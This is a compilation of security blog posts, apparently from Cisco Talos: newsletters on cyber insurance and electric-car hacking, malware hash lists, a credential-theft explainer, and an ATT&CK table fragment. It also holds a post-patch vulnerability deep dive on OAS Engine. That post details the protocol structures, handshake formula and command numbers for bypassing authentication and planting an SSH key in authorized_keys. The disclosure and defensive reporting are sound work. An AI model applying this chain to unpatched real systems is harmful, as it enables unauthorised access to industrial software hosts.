Use NTDSDump to gather credentials

Discovery (TA0007)

Example

T1018 Remote System Discovery

Adversaries may use ping to discover remote systems

T1482 Domain Trust Discovery

Attackers may obtain information on domain trust relationships

Lateral Movement (TA0008)

Example

T1210 Exploitation of Remote Services

Attackers can abuse remote services, such as RDP

T1021.004 Remote Services: SSH

Adversary made attempts to move laterally using SSH

Collection (TA0009)

Example

T1005 Data from Local System

Attackers can collect and stage data for later exfiltration from infected machines

T1560 Archive Collected Data

Attackers can archive staged data using WinRAR

Command and Control (TA0011)

Example

T1219 Remote Access Software

Remote access tools found on the compromised system  

T1105 Ingress Tool Transfer

Attackers can use PowerShell commands, such as “Invoke-WebRequest” to transfer tools from an external system

Exfiltration (TA0010)

Example

T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Using FTP for file exfiltration

T1041 Exfiltration Over C2 Channel

Adversaries may steal data over existing C2 channels

Impact (TA0040)

Example

T1486 Data Encrypted for Impact

Deploy Cactus ransomware and encrypt critical systems

T1486 Inhibit System Recovery

Deleting shadow volume copies before ransomware execution

Why is the cost of cyber insurance rising?

25 January 2024 at 19:00
Why is the cost of cyber insurance rising?

I just bought an electric car last week, so I’ve been shopping for new car insurance policies that could offer me a discount for ditching gas. 

We’re all familiar with the boring process of entering the same information 10 times over into 10 different companies’ websites trying to see who comes out the cheapest and offers the best bundles, discounts or deals. 

Unfortunately, with cybersecurity insurance, there are no bundles or “Personal Price Plans” to enroll in, and costs are rising. 

This is nothing to say about whether an organization should get cyber insurance. That is 100 percent their decision to make, and every case is going to be different. But for companies who are interested in getting these types of policies to be best prepared to recover from and deal with a potential security incident, it’s now more expensive than ever to get cyber insurance. 

A report last week from Dark Reading indicated that cyber insurance costs are expected to rise over the next 12 to 24 months. This would be after premiums for these plans rose 50 percent in 2022, according to Bloomberg, though they largely held steady in 2023. 

This problem isn’t isolated to just the U.S., either. A November report from business continuity service Databarracks surveyed companies in the U.K. and found that nearly a third of respondents said their cyber insurance had increased in cost over the past year, while more companies than ever said they had any type of cyber insurance policy, implying a totally new line item for their budgets. 

This rising cost could certainly be attributed to all the classic factors of why anything gets more expensive: market demand, inflation, rising costs of doing business, etc. But an increase in ransomware activity seems to be a large driver, too. 

The same Databarracks survey found that 24 percent of all IT downtime for respondents was due to a cyber incident, up 14 percent from 2018. Thirty-seven percent of all companies said they experienced a ransomware attack in 2023, and more than half experienced some sort of security incident in general. 

As we saw in our most recent Talos Incident Response Quarterly Trends Report, ransomware may rise again after a relatively quiet period from mid-2022 through the summer of 2023. Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Talos IR, a 17 percent increase from the previous quarter. 

That’s not to say that it’s a lock that ransomware attacks are going to be up in 2024, but if they are, cyber insurance policies are only going to get more expensive, which means further shifting budgets for companies of all sizes.  

There is no one-size-fits-all approach for how anyone should approach getting a cybersecurity insurance policy. Still, if companies can’t steady the cost of premiums, it may send executives shopping for other, potentially less effective, methods of preparing for a cyber attack. 

The one big thing 

Cisco Talos Incident Response (Talos IR) saw a significant increase in ransomware activity in its engagements during the fourth quarter of 2023, while education remains one of the most targeted sectors. Talos IR also observed several brand new ransomware operations for the first time in Q4, including Play, Cactus, BlackSuit and NoEscape. The latest Talos IR Quarterly Trends Report has a full breakdown of the top threats they saw in the wild and an idea of where attacker tactics might be headed in 2024. 

Why do I care? 

This was the first time in all of 2023 that the rate of ransomware attacks rose during IR engagements. Education and manufacturing were tied for the most targeted verticals, accounting for nearly 50 percent of the total number of incident response engagements, so those industries should note Talos IR’s findings. 

So now what? 

The lack of MFA remains one of the biggest impediments to enterprise security and led to many of the attacks Talos IR saw in Q4. All organizations should implement some form of MFA, such as Cisco Duo. 

Top security headlines of the week 

One of the largest password dumps ever was posted last week to an online forum, seemingly containing more than 25 million login credentials that had never been leaked before. In all, the collection includes 71 million unique credentials for a range of websites, including the online video game “Roblox,” Yahoo, Facebook and eBay. Though many of these credentials had already been leaked in the past, the user hosting the file claims they all came through an information-stealing malware that collected the usernames and passwords in plain text. Credentials that are stolen via data breaches often contain encrypted passwords. The operator behind the website Have I Been Pwned? first discovered the trove of data earlier this month, but it’s likely been in circulation in various online forums for at least four months. Each line in the dataset, which consists of images and plain text, includes a login URL, the associated account’s name and a password. (Ars Technica, Bleeping Computer

A new report indicates that each Facebook user could be sharing their personal data with thousands of other companies. The study, conducted by the non-profit Consumer Report, followed more than 700 volunteers’ Facebook accounts and found that, on average, each participant in the study had their data sent to Facebook by 2,230 companies. Some respondents had their data shared with more than 7,000 different companies, and in all, the study captured more than 180,000 organizations that shared data with Facebook. The study was specifically meant to capture “server-to-server” tracking, in which personal data goes from a company’s servers to Meta’s, the parent company of Facebook, servers. The more “traditional” form of tracking for Meta through pixels on other companies’ websites can easily be spotted in a web browser, while server-to-server cannot. The three companies that appeared the most often connected to participants’ accounts in the study were all data brokers, who presumably turned around and sold that data to additional companies for a profit. Consumer Reports listed multiple recommendations for Facebook to improve its data protection, including improving the transparency of Facebook’s data collection tools, making it easier for users to opt out of data sharing and asking the U.S. government to pass data minimization laws. (Consumer Reports, The Markup

Apple released a series of security updates this week for its devices that fixed three vulnerabilities in the WebKit browser engine that were already being exploited in the wild. One of the vulnerabilities, CVE-2024-23222, is believed to have been exploited in more recent versions of Apple’s mobile operating system iOS. An attacker could exploit this vulnerability to execute remote code on the targeted device. Two other vulnerabilities, CVE-2023-42916 and CVE-2023-42917, were likely exploited in version of iOS dating back to before 16.7.1. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2024-23222 to its Known Exploited Vulnerabilities (KEV) list. Apple released patches for all its devices, including the Apple TV streaming box, iPad and macOS desktop computers. (SecurityWeek, Computer Weekly

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: e340aa9f08ce8128e17a3186053bfaf2dc119d98a64f7bc4d37fb7be03365c93 
MD5: 5800fc229e3a5f13b32d575fe91b8512 
Typical Filename: client32.exe 
Claimed Product: NetSupport Remote Control 
Detection Name: W32.Riskware:Variant.27dv.1201 

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab 
MD5: 4c648967aeac81b18b53a3cb357120f4 
Typical Filename: yypnexwqivdpvdeakbmmd.exe 
Claimed Product: N/A  
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 581866eb9d50265b80bae4c49b04f033e2019797131e7697ca81ae267d1b4971 
MD5: 4c5fdfd4868ac91db8be52a9955649af 
Typical Filename: N/A 
Claimed Product: N/A 
Detection Name: W32.581866EB9D-100.SBX.TG 

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440 
MD5: ef6ff172bf3e480f1d633a6c53f7a35e 
Typical Filename: iizbpyilb.bat 
Claimed Product: N/A  
Detection Name: Trojan.Agent.DDOH 

SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a 
MD5: 200206279107f4a2bb1832e3fcd7d64c 
Typical Filename: lsgkozfm.bat 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::tpd 

OAS Engine Deep Dive: Abusing low-impact vulnerabilities to escalate privileges

31 January 2024 at 17:00
OAS Engine Deep Dive: Abusing low-impact vulnerabilities to escalate privileges

Open Automation Software recently released patches for multiple vulnerabilities in their OAS Engine

Cisco Talos publicly disclosed these issues after working with Open Automation Software to ensure that patches were available for users. Now that a fix has been released with Version 19, we want to take the time to dive into a few of these vulnerabilities and show how a handful of bugs that could be viewed as low-impact could be exploited as a series to carry out various malicious actions, even going as far to gaining access to the underlying system.

Background

The OAS Platform facilitates the simplified transfer of data between various proprietary devices and applications. It can connect products from multiple vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.

Vulnerabilities

During this research, we discovered eight vulnerabilities, five of which are covered here. Full technical details can be found in the respective vulnerability reports: 

TALOS-2023-1769

TALOS-2023-1770

TALOS-2023-1771

TALOS-2023-1772

TALOS-2023-1773

TALOS-2023-1774

TALOS-2023-1775

TALOS-2023-1776

Bypass authentication via default configuration

TALOS-2023-1769 (CVE-2023-31242)

By default, when the OAS Engine is installed, no admin application user is set. Without an admin application user, no authentication is required to access certain functionality that would otherwise require valid credentials, including creating new users. Additionally, if an admin user is created, but the configuration is not saved before the OAS Engine restarts, those changes will be lost and the system will revert to disregarding the authentication structure.

Bypass authentication via stolen U_EP

TALOS-2023-1770 (CVE-2023-34998)

When a privileged request is sent by a legitimate administrator to the OAS Engine, the traffic is sent unencrypted across the wire. As such, it is possible for a bad actor capable of sniffing traffic between the client and OAS Engine to capture a valid U_EP authentication structure. The attacker can then use the structure to craft their successful privileged request. Any captured U_EP remains valid until the associated user account has been deleted.

File overwrite

TALOS-2023-1771 (CVE-2023-32615)

The OAS configuration tool provides a feature to save the running configuration to disk on the OAS engine server. When this information gets saved, the user specifies the path and filename, restricted only by the permissions of the underlying OAS user system account. If the chosen file already exists, the contents of that file will be replaced with the configuration data.

Add user unsanitized input

TALOS-2023-1772 (CVE-2023-34317)

Access to the various features of the OAS Engine and associated data is controlled through the use of OAS engine application users. 

Application administrator users can add additional users to the application with varying levels of permissions. These users exist within the OAS Engine exclusively, not on the underlying system. When adding a user, no filtering is performed on the value entered for the username, allowing a wide variety of characters not appropriate for a username to be entered and subsequently stored in the running configuration.

List directory

TALOS-2023-1774 (CVE-2023-32271)

Through the OAS Configuration tool, the functionality to load a saved configuration from disk or save a running configuration to disk is exposed to authenticated application users. 

Accompanying the configuration management tools is a remote file browser that allows users to see what files exist on the remote system.

Attack walkthrough

By combining these vulnerabilities, it is possible to gain access to the underlying system as the user running the OAS Engine. 

In this scenario, an adversary could: 

  1. Gain access to a valid authentication structure.
  2. Search the filesystem for evidence of an SSH server.
  3. Store an SSH key in the running OAS configuration.
  4. Write the running configuration to disk.

Interacting with the OAS Engine

Before an adversary can make any of the requests needed to exploit the system, they’d need to understand the protocol used by the OAS Configuration utility. These requests consist of two related Protobuf structures — Client_Send and OASPacket — concatenated together and sent to the OAS Engine via TCP/58727 (by default). Responses to these requests will be delivered in a similar format, replacing the Client_Send Protobuf with a Server_Send.

The Server_Send Protobuf takes the following form, where the Handshake and Offset fields must be retained if a subsequent Client_Send is to be sent. 

message Server_Send {
  int32 Version = 1;
  int32 OASVersion = 2;
  int32 Handshake = 3;
  int32 Offset = 4;
  int32 Length = 5;
}

The Client_Send Protobuf takes the following form, where Version is 0x01, and Length is the size in bytes of the OASPacket Protobuf:

message Client_Send {
  int32 Version = 1;
  int32 ClientHandshake = 2;
  int32 Handshake = 3;
  int32 Length = 4;
}

The ClientHandshake and Handshake fields are used in a client/server handshake that is likely in place to prevent replay attacks. ClientHandshake is a randomly generated value less than or equal to 0x3FFFEC75 that will be used in a subsequent request's handshake process. Handshake is a value calculated by taking the Handshake field from the prior Server_Send response, adding it to the Offset field from that same response, subtracting by both 0x12CB and the value of the ClientHandshake field from the prior Client_Send request, and finally adding 0x888. This can be better visualized with the following formula:

handshake = server_send_handshake + server_send_offset - 0x12CB - previous_client_send_handshake + 0x888

The OASPacket Protobuf takes the following form, where LDCMode, LDCHost, and SendingGUID are not always necessary, Version is 0x01, CommandNumber defines the type of request being sent, and DataAsBytes is a set of serialized Protobufs describing the request data. 

message OASPacket {
  int32 Version = 1;
  int32 LDCMode = 2;
  int32 CommandNumber = 3;
  string LDCHost = 4;
  string SendingGUID = 5;
  bytes DataAsBytes = 6;
}

Many of the requests contain a field of the custom type U_EP. This field contains a serialized copy of credentials used to authenticate privileged requests. The U_EP Protobuf takes the following form, where Version is 0x01, and Seed is a random value used to encrypt the credentials:

message U_EP {
  int32 Version = 1;
  int32 Seed = 2;
  bytes DataAsBytes = 3;
}

The DataAsBytes field contains a serialized and encrypted User_EncryptedPassword Protobuf, which takes the following form:

message User_EncryptedPassword {
  string Username = 1;
  string EncyprtedPassword = 2;
}

By combining the generic structures discussed here with the request-specific structures discussed later, an adversary could replicate the desired communications with the OAS Engine. 

Bypass authentication

Many of the requests necessary to successfully interact with the OAS Engine require authentication. At this time, two options exist to bypass this authentication requirement: abusing the default configuration or reusing a valid authentication structure. 

Option 1: Abusing Default Configuration

As the requests needed to gain access require authentication, it is necessary first to acquire a valid U_EP structure. 

The easiest way to obtain valid credentials is to use the vulnerability disclosed in TALOS-2023-1769. This vulnerability is only exploitable in cases where the OAS Engine is still running its default configuration. To determine if the target in question is vulnerable, an OASPacket with Version set to 0x01 and CommandNumber set to 0x13F can be used. When correctly sent, the server will return a response with the following format:

message Version_Runtime_License {
  int32 Version = 1;
  bool Runtime = 2;
  string LicenseString = 3;
  string MtcExpirationString = 4;
  bool NetCore = 5;
  bool WinOS = 6;
  bool LinuxOS = 7;
  string AssemblyVersion = 8;
  string BaseDirectory = 9;
  bool EnableActiveDirectory = 10;
  string ActiveDirectoryEntry = 11;
  string ActiveDirectoryFilter = 12;
}

If the server is vulnerable to TALOS-2023-1769, the MtcExpirationString field will contain the string "Create an Admin User." In this state, the server does not perform any verification of the U_EP structure, allowing privileged requests by unauthenticated users as long as any value is provided in the U_EP field.

If an admin user has already been created, the OAS Engine will not be vulnerable to TALOS-2023-1769 and will require a different approach. The vulnerability disclosed in TALOS-2023-1770 provides an alternative way to obtain a valid U_EP

Option 2: Pass the U_EP

This vulnerability occurs when legitimate configuration requests, including privileged ones, are sent to the OAS Engine. Most of these messages are sent in cleartext, as disclosed in TALOS-2023-1770. The exception is a field within the U_EP authentication structure, referred to within the OAS Platform as the User_EncryptedPassword. The User_EncryptedPassword is a block of data containing the authenticating username and associated encrypted password that is supplied as a block of AES-encrypted, serialized data to the DataAsBytes field in a U_EP authentication structure, as shown below.

message U_EP {
  int32 Version = 1;
  int32 Seed = 2;
  bytes DataAsBytes = 3;
}

message User_EncryptedPassword {
  string Username = 1;
  string EncyprtedPassword = 2;
}

While it is possible to decrypt the User_EncryptedPassword and get access to the raw username and encrypted password (TALOS-2023-1776), it is not necessary for authentication. 

When a legitimate U_EP is built, a value is randomly generated and stored in the Seed field of the structure. This seed is subsequently used to build the AES key used to encrypt the User_EncryptedPassword data. This process generally results in a different U_EP value for each new configuration session when conducted through the official tool, but this process does not cause prior sessions to be terminated. 

If an attacker obtains access to legitimate configuration traffic by sniffing network traffic, obtaining an old traffic capture, or any other method, they can extract the U_EP structure and successfully authenticate for as long as the associated user exists within the OAS Engine. 

Explore the Filesystem

With the ability to successfully send authenticated messages, we can leverage the vulnerability disclosed in TALOS-2023-1774 to explore the filesystem. 

From here a variety of approaches could be taken, but for this deep dive, we are looking for the existence of the sshd_config file in /etc/ssh/ and the .ssh directory in the OAS user's home directory, indicating that an SSH server is likely enabled on the system. 

We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x0F. Additionally, the DataAsBytes field will need to be filled with a serialized Browse_File Protobuf containing a valid U_EP, the GetDirectories and GetFiles flags set, a DirectoryPath set to the absolute path of the desired location, and a FileExtension field containing an asterisk to indicate any file type.

message Browse_File {
  int32 Version = 1;
  U_EP UEP = 2;
  bool GetDrives = 3;
  bool GetDirectories = 4;
  bool GetFiles = 5;
  string DirectoryPath = 6;
  string FileExtension = 7;
}

When successfully sent, the OAS Engine will respond with the results in a Browse_File_Result Protobuf, containing all of the data organized by type. 

message Browse_File_Result {
  bool Success = 1;
  optional string ErrorString = 2;
  repeated string Drives = 3;
  repeated string Directories = 4;
  repeated string ShortDirectories = 5;
  repeated string Files = 6;
  repeated string ShortFileNames = 7;
}

Upload new SSH key

After verifying with some certainty that an SSH server is running, it is possible to leverage TALOS-2023-1771 and TALOS-2023-1772 to upload a new SSH key and subsequently gain access to the underlying system.

Since there is not any dedicated file upload functionality exposed by the OAS Engine, it is necessary to get more creative. By combining the improper input validation vulnerability disclosed in TALOS-2023-1772 with the external control of the filename vulnerability disclosed in TALOS-2023-1771, it is possible to create a makeshift file upload process. 

💡
It is important to note that while functional for this scenario, this technique will result in a file that cannot be fully controlled. As such, it is likely to create a file that could be considered corrupt by most applications.

When adding a new application user to the OAS Engine, the user details are taken and written to the running OAS Engine configuration. During this process, no verification is performed to ensure that the value entered contains exclusively characters that make sense for a username. Additionally, there is no limit on the length of the username. 

By supplying the entirety of an SSH public key that we control as the username of a new entry, it is possible to abuse this lack of verification to get our desired file data stored in the running OAS configuration

We can do this through the use of an OASPacket with Version set to 0x01 and CommandNumber set to 0x88. Additionally, the DataAsBytes field will need to be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value containing the public key data. 

message String {
  int32 Version = 1;
  U_EP UEP = 2;
  string String = 3;
}

With our key stored in the running configuration, we can then trigger it to get written to a file of our choice, in this case, the OAS user's authorized_keys, file, by saving the configuration to disk. While the file will contain a large amount of OAS configuration information that is meaningless to the SSH server, the public key supplied via a username will still be interpreted successfully as long as it is surrounded by newline characters.

We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x74. The DataAsBytes field must again be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value, this time containing the absolute path to the file where the configuration should be written. 

message String {
  int32 Version = 1;
  U_EP UEP = 2;
  string String = 3;
}

If everything works correctly and the target has its SSH server running, it will be possible to log in as the underlying OS user running the OAS engine via SSH.

Mitigations

Before the release of this walkthrough and the associated vulnerabilities, Cisco Talos worked with Open Automation Software to ensure that patches were made publicly available in Version 19. All users are recommended to upgrade to the latest version. 

For Snort coverage, (SIDs 61991 - 61994, 62003, and 62004) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

The many ways electric cars are vulnerable to hacks, and whether that matters in a real-world

1 February 2024 at 19:00
The many ways electric cars are vulnerable to hacks, and whether that matters in a real-world

I’d hate to be labeled a “car guy” now mentioning my new electric car in the lede of two newsletters in a row, but I couldn’t resist. 

I’d been reading headlines for years about how electric cars (most notably Tesla) were vulnerable to a range of security vulnerabilities, even some that could allow bad actors to steal the car if they were close enough to the car’s keys. While I don’t own a Tesla, I am now more invested in following the various ways attackers can take advantage of the connectivity of electric cars. 

I’ve bemoaned before about everything being “smart” now, but there’s no escaping it if you want to convert to an electric vehicle. They’re all Wi-Fi connected so drivers can control the charging speed and timing of their cars, monitor public charging stations and communicate with the dealer about any electrical failures. 

A whole new slew of electric car-related vulnerabilities came out last week thanks to the Pwn2Own hacking event in Tokyo as part of the Automotive World conference. Car and charging companies were offering a combined $1 million in bug bounty payments for researchers who could find security vulnerabilities in a range of cars and electric car-related products like home chargers. 

In all, researchers discovered 49 zero-day vulnerabilities, including a two-vulnerability exploit chain in Tesla cars that could allow an attacker to take over the onboard infotainment system. Other vulnerabilities were discovered in ChargePoint and Juicebox products, two prominent manufacturers of home, travel and commercial electric charging equipment. Although few details are available on the specific vulnerabilities, the Zero Day Initiative said on its blog that one researcher “was able to execute his attack against the ChargePoint Home Flex.” 

Some of these exploits are funny to read about. Imagine an attacker taking the time to hack into a Tesla’s modem so they can turn on a car’s windshield wipers without the driver knowing. Tesla stated after Pwn2Own that none of the vulnerabilities discovered would be more than an annoyance for the driver.  

Certainly, previous vulnerabilities that could allow someone to drive away with your car would be more than an annoyance, but this latest batch of bugs has lower stakes than that.  

I could see a lot of traditionalists who are hesitant to switch to electric cars being hesitant because their 2011 Toyota Corolla doesn’t require the internet to run. That doesn’t mean that owning an electric car or installing a home charger are inherently risky. I would argue that the average IoT device or home router runs a higher risk of exposing your home network to a larger risk surface because they are often overlooked in security.  

As weird as it is to say, just like you patch an IoT device, it’s important to patch the firmware on your vehicle (gas-powered or not) regularly. Still, I’m not sure it’s time to just assume your electric car is going to be hacked like in “Cyberpunk 2077” because these vulnerabilities are out there. 

The one big thing 

The FBI says it’s shut down the recently emerged Volt Typhoon, a Chinese state-sponsored actor. FBI Director Christopher Wray announced the disruption Wednesday during a hearing with a U.S. House committee. Volt Typhoon was first disclosed in mid-2023 for targeting outdated wireless routers, including some belonging to U.S. critical infrastructure. The hackers had been targeting U.S. water treatment plants, the power grid, oil and natural gas pipelines, and transportation systems, Wray said. 

Why do I care? 

Aging network infrastructure is a problem for all users across the globe. As highlighted by Talos’ report on JaguarTooth last year, unpatched routers or older routers with security vulnerabilities are easy targets for state-sponsored actors, and they can often sit unnoticed on these devices for months or years. Volt Typhoon is particularly notable for its targeting of high-risk sectors and U.S. military bases.  

So now what? 

The FBI and U.S. Cybersecurity and Infrastructure Security Agency warned router vendors to patch their devices as soon as possible to prevent the exploitation of vulnerabilities Volt Typhoon is known for using. All users should check to make sure their routers, regardless of make, model or age, have the latest firmware installed. We also have several recommendations for everyone to defend their network infrastructure and upgrade to newer hardware. 

Top security headlines of the week 

Ads displayed in several different popular mobile apps are part of a mass global surveillance effort, with the information eventually being sold to national security agencies that can track the physical location, hobbies, and names of users’ family members. The ad-based tool, known as Patternz, strikes deals with smaller ad networks to gather information from users’ devices when they access some apps like Kik messenger and the 9gag online forum. While reporting from 404 Media shows a specific example targeting an Android user, the same methods work on iOS devices. Separately, security researchers also found that many push notifications on iPhones are unknowingly sending user information back to apps, even if the user doesn’t have those apps installed. When triggered, some push notifications will send app analytics and device information to remote servers belonging to other apps like TikTok, Facebook, Instagram and X, formerly known as Twitter. (404 Media, 9to5 Mac

A cyber attack disrupted nearly all the government services of Fulton County, Georgia, this week, with systems still recovering as of Wednesday afternoon. The attack is notable because Fulton County is where former U.S. President Donald Trump is charged and being tried for his involvement in trying to overturn the results of the 202 presidential election. The cyber attack also targeted the office of the District Attorney who investigated and is charging Trump. The county’s government phone systems were all down, as were access to court filings, tax processing and more. Law enforcement was still investigating the attack as of Wednesday afternoon, though county officials said they had not seen any evidence that personal information of employees or citizens had been stolen. (NBC News, CNN

Cozy Bear, a well-known Russian APT, is reportedly behind two recent breaches at Microsoft and Hewlett Packard Enterprise (HPE). Microsoft, calling the group “Midnight Blizzard” said in a blog post that they detected a state-sponsored attack on their internal systems on Jan. 12, 2024. Microsoft stated that the actor got in by abusing user accounts “to create, modify, and grant high permissions to OAuth applications that they can misuse to hide malicious activity.” This was the second time in six months that Microsoft disclosed a state-sponsored actor targeting its internal systems. In the case of Cozy Bear, the hacking group allegedly monitored the email accounts of senior Microsoft executives and members of the company’s cybersecurity teams. Executives from HPE filed a notice with the U.S. Securities and Exchange Commission last week stating that the same actor “gained unauthorized access to HPE’s cloud-based email environment.” HPE said the actor initially gained access through a compromised Microsoft Office 365 email account. (Microsoft, Ars Technica

Can’t get enough Talos? 

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440 
MD5: ef6ff172bf3e480f1d633a6c53f7a35e 
Typical Filename: iizbpyilb.bat 
Claimed Product: N/A  
Detection Name: Trojan.Agent.DDOH 

SHA 256: 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7  
MD5: 0e4c49327e3be816022a233f844a5731  
Typical Filename: aact.exe  
Claimed Product: AAct x86  
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

SHA 256: 77c2372364b6dd56bc787fda46e6f4240aaa0353ead1e3071224d454038a545e 
MD5: 040cd888e971f2872d6d5dafd52e6194 
Typical Filename: tmp000c3787 
Claimed Product: Ultra Virus Killer 
Detection Name: PUA.Win.Virus.Ultra::95.sbx.tg 

SHA 256: e340aa9f08ce8128e17a3186053bfaf2dc119d98a64f7bc4d37fb7be03365c93 
MD5: 5800fc229e3a5f13b32d575fe91b8512 
Typical Filename: client32.exe 
Claimed Product: NetSupport Remote Control 
Detection Name: W32.Riskware:Variant.27dv.1201 

SHA 256: 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab 
MD5: 4c648967aeac81b18b53a3cb357120f4 
Typical Filename: yypnexwqivdpvdeakbmmd.exe 
Claimed Product: N/A  
Detection Name: Win.Dropper.Scar::1201 

How are user credentials stolen and used by threat actors?

6 February 2024 at 08:30
How are user credentials stolen and used by threat actors?

You’ve no doubt heard the phrase, “Attackers don’t hack anyone these days. They log on.” 

By obtaining (or stealing) valid user account details, an attacker can gain access to a system, remain hidden, and then elevate their privileges to “log in” to more areas of the network.  

Unfortunately, the use of valid accounts is prevalent across the threat landscape. It was the second-most common MITRE ATT&CK technique that Talos observed in our threat telemetry in 2023. 26% of all Cisco Talos Incident Response engagements last year involved the use of valid accounts. 

In figures from Incident Response engagements from the fourth quarter of 2023 , the top means of gaining initial access was a tie between the use of compromised credentials on valid accounts and exploiting public-facing web applications. 36% of malicious tooling was also focused on accessing and collecting credentials. You can read more about this in our Incident Response Quarterly Trends report. 

The pervasiveness of these types of attacks is driven by a few key reasons: 

  1. Most companies think that cyber attacks will come from “the outside in.”   

Attacks that use valid accounts to log on take more of an “inside-out” approach. Once the initial access is gained, they are stealthily inside the network and there is more of a chance that the attacker will evade detection as they are trying to move laterally. Especially if the network is unsegmented. Long story short — exploiting a vulnerability can certainly lead to initial access, but authorized credentials help the adversary navigate laterally under the radar. 

  1. Stolen credentials are for sale on the dark web.  

Effectively, some threat actors are in the market of stealing credentials simply to sell them to the highest bidder. Actors who purchase them may well use them for a larger targeted ransomware campaign and/or for espionage purposes. For account details that come with high privileges (for example, those who work in finance or have access to networking devices), the bigger the price.  

  1. Attackers are following the trends of how we work today.  

We’re accessing more systems remotely, we’re accessing company systems on our own devices, and cloud solutions are becoming increasingly commonplace. From a threat actor perspective, their mindset is shifting. “Why force my way into a system when I can just log in?” 

Speaking to those remote working trends, across the broader Cisco organization, we now see 1.5 billion multi-factor authentication requests every month (via Cisco Duo). For each authentication request, Duo evaluates what is a request from a trusted user, compared to a bad request from an attacker.  

The lack of MFA (or poorly installed MFA) is frequently the No. 1 security weakness in our Talos Incident Response Quarterly Trends report (as was the case in Q4 2023). According to Oort, whom Cisco acquired in 2023, 40% of enterprise customers have no MFA, or use weak MFA (for example, clear text SMS). This appears to be contributing to the challenge of bad actors using valid accounts as a key initial access tactic. 

So how are attackers effectively ‘logging on’ with valid account credentials? Here are some tactics that we frequently encounter within Talos threat telemetry and Incident Response engagements: 

Credentials stolen from password stores 

Stolen credentials from password stores took the No. 4 spot in the top 20 list of the most common MITRE ATT&CK techniques Talos saw in 2023. This is when users store passwords on various applications or web browsers. Adversaries search across common password storage locations to look for passwords that have been stored there. This technique has been used by threat actors for many years, but the rate at which this is still happening highlights the need for why organizations and individuals should be using password managers and not the built-in ones in web browsers. 

Credentials stolen from fake login portals via phishing campaigns 

Attackers will often try and replicate common login portals, such as Microsoft Office 365, and may send the user a phishing email asking them to log in due to some issue with their account. On the surface, the web page looks legitimate, but it’s a fake copy with malicious software behind it which is designed to capture user account details. 

Input capture 

Input capture was seventh on the top 20 MITRE ATT&CK list. This is a technique where threat actors will deploy methods to capture login data that is inputted by the user. The most prevalent type of input capture is keylogging, where adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging usually occurs after a user is the unwitting victim of stolen credentials via a phishing campaign or other means of access. 

Stealing or Forging Kerberos Tickets 

The stealing of Kerberos tickets was the ninth most common MITRE ATT&CK technique Talos observed in 2023. Kerberos is a network authentication protocol that authenticates service requests and grants a ticket for a secure connection. In the case of bad actors, they will try and steal these tickets (or forge them) to enable unauthorized access.  

Targeting dormant accounts 

According to Oort data from 2022, dormant accounts represent almost a quarter of the average company’s total accounts, and these accounts are regularly targeted (over 500 times per month on average). Attackers will look for accounts that are not used regularly but still have network access (for example, an employee or a temporary contractor who left the company, but their access was never removed).  

Infostealers 

Infostealers, or information-stealing malware, appear frequently in Talos IR engagements. Infostealers can be used to gain access to any kind of sensitive information including financial details and even intellectual property. Most commonly, we see infostealers being used to access and collect user credentials. 

Brute force attacks 

If an attacker has part of the login details, they may try brute force techniques to try and repetitively guess the password. These may not necessarily be entirely random guesses, as attackers may use knowledge that has been gained from other attacks or leaks, such as the ones listed above. This highlights the need for organizations to limit the amount of consecutive failed logon attempts. 

Password spraying 

Password spraying is a specific kind of brute force attack, but instead of brute forcing a password on a single system, the actors will use passwords from information leaks. They will try them on popular web services in the hope that users will reuse their passwords. This highly reduces the chance of detection and password blocking. 

QR code phishing 

According to public reporting, there has been a recent rise in QR code phishing to gain user credentials. The Cisco Talos Incident Response team were recently called in to help with a such an incident where credentials were stolen. A phishing email was sent to the company email of several employees and the email contained a PDF with a malicious QR code. Some employees used their smartphone to scan the code which paved the way for the attacker to gain their credentials and log in to the organisation’s system. The exact reason as to why the attacker was able to obtain the credentials is unknown due to a lack of logs in the smartphone, but one reason could be that passwords were saved in an unpatched browser. 

Going after the users 

Some of the above techniques can be addressed by defender tools and configurations within the organization’s network environment which allow for the detection of unauthorized access. But since there are many identity-type attacks that seek to manipulate or coerce the user themselves, we also need to talk about how users are being targeted today.  

I asked Talos’ Head of Outreach Nick Biasini about what his main recommendations were for the coming year. He spoke about the increased targeting of users and how adversaries are getting more relentless in their attempts to gain valid credential-based access to a system. 

He mentioned that whilst the malware itself used to gain these credentials won’t necessarily be very sophisticated, it is more about the intensity of the attacks. Here’s his insights in full:  

Phishing emails are one of the most common ways adversaries compromise victims (it was No. 3 in Talos’ list of initial access vectors for 2023 and has consistently been a top-ranked threat in Talos Incident Response findings for years). In the last year alone, 25% of the initial access vectors identified in Talos Incident Response engagements were comprised of phishing. This observation is consistent with U.S. government findings, with the FBI noting that phishing was the top incident reported to its Internet Crime Complaint Center (IC3) in 2022.  

Most people think of phishing/social engineering as clicking on a malicious link and triggering malware. But there are deeper aspects to these attacks that can involve the manipulation of users to do bidding on behalf of threat actors. These are known as insider attacks. 

Insider attacks 

